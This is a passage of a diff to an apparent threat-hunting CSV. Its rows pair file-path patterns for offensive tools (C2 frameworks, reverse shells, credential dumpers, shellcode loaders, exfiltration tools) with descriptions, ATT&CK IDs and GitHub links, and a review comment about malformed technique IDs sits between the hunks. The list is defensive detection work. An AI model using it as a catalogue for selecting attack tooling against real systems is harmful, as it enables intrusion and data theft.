The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*/SharpCradle/*","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","10","10","275","59","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z" "*/SharpDomainSpray.git*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*/SharpDoor.cs*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*/SharpDoor.git*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" -"*/SharpDPAPI.git*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential 
Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*/SharpDump*","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/SharpDPAPI.git*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*/SharpDump*","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/SharpEfsPotato*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*/SharpExfiltrate.git*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data 
Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*/SharpExfiltrate/*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*/SharpGmailC2.git*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" -"*/SharpHandler.py*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/SharpHandler.py*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - 
T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*/SharpHide.git*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*/SharpLDAP.git*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" "*/SharpNoPSExec*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" -"*/SharpRDP.git*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*/SharpRDP.git*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" 
"*/SharpRDPHijack*","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","1","N/A","10","4","382","84","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" -"*/SharpShares/Enums*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" -"*/SharpShellPipe.git*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","97","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*/SharpShares/Enums*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*/SharpShellPipe.git*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" "*/SharpSocks*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" -"*/SharpSploit*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/SharpSploit*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/SharpSploit/*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 
- T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "*/SharpSpoolTrigger*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*/SharpSpray.exe*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" 
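Review bot: The two covenant rows rewritten in this hunk (`*/SharpDump*` and `*/SharpSploit*`) still write sub-techniques with a hyphen, `T1573-001 - T1573-002 - …`, while every other row here uses the dotted form, so a consumer that looks up each entry of `metadata_tool_techniques` in ATT&CK will not match them. Since the rows are being re-emitted anyway, normalise them to `T1573.001 - T1573.002 - T1059.001 - T1059.003 - T1059.004 - …` and drop the IDs with no ATT&CK counterpart (as far as I know T1573 defines only .001 and .002, and T1570 has no sub-techniques). The `*/SharpCollection/*` row has a related problem: its technique list ends in a truncated `T12`, which looks like a length cut-off when the field was produced. If these rows are refreshed by a script, a per-ID check such as `^T\d{4}(\.\d{3})?$` before writing the CSV would catch both cases.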
@@ -5207,11 +5263,11 @@ "*/SharpView.git*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" "*/SharpWSUS*","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for lateral movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nettitude/SharpWSUS","1","1","N/A","N/A","5","408","63","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z" "*/SharPyShell*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" -"*/shell/password.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/shell/password.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" "*/shell/shell_port.*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" -"*/shell_exec.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/shell_exec.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/Shell3er/*","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","shell spawning","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","1","N/A","N/A","1","56","11","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" -"*/shellcode*loader.bin*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/shellcode*loader.bin*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/shellcode.bin*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*/shellcode.bin.*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*/shellcode.hex*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" 
@@ -5219,14 +5275,14 @@ "*/shellcode_excel*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/ShellCode_Loader*","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. 
currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","10","10","389","49","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" "*/shellcode_samples/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*/shellcode_sources/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/shellcode_sources/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*/ShellcodeFluctuation*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" -"*/Shellcode-Hide.git*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - 
TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*/Shellcode-Hide.git*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*/SHELLCODELOADER*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*/Shellcode-Loader.git*","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","10","2","139","30","2023-09-08T06:55:34Z","2021-08-08T08:53:03Z" 